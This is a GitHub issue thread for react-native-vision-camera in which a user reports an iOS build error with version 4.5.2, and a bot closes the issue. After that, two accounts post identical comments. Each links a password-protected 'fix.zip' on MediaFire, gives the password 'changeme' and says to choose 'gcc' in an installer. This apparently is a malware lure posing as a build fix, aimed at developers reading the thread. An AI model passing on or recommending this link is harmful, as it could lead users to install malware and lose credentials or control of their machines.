margelo/react-native-vision-camera #3155: 🔧 编译报错

sanguineman91, 2024-08-26:
### How were you trying to build the app?

[image]

### Full build logs

```tsx
🔧 react-native 0.68.5 使用4.5.2版本编译报错
```

### Project dependencies

```json
"react": "17.0.2",
"react-dom": "17.0.2",
"react-native": "0.68.5",
```

### VisionCamera Version

4.5.2

### Target platforms

iOS

### Operating system

MacOS

### Can you build the VisionCamera Example app?

I didn't try (⚠️ your issue might get ignored & closed if you don't try this)

### Additional information

- [ ] I am using Expo
- [ ] I have enabled Frame Processors (react-native-worklets-core)
- [X] I have read the [Troubleshooting Guide](https://react-native-vision-camera.com/docs/guides/troubleshooting)
- [X] I agree to follow this project's [Code of Conduct](https://github.com/mrousavy/react-native-vision-camera/blob/main/CODE_OF_CONDUCT.md)
- [X] I searched for [similar issues in this repository](https://github.com/mrousavy/react-native-vision-camera/issues) and found none.

closed 2024-08-26 by maintenance-hans[bot]

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HaxBaba123, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

sanguineman91, 2024-08-26:
[image]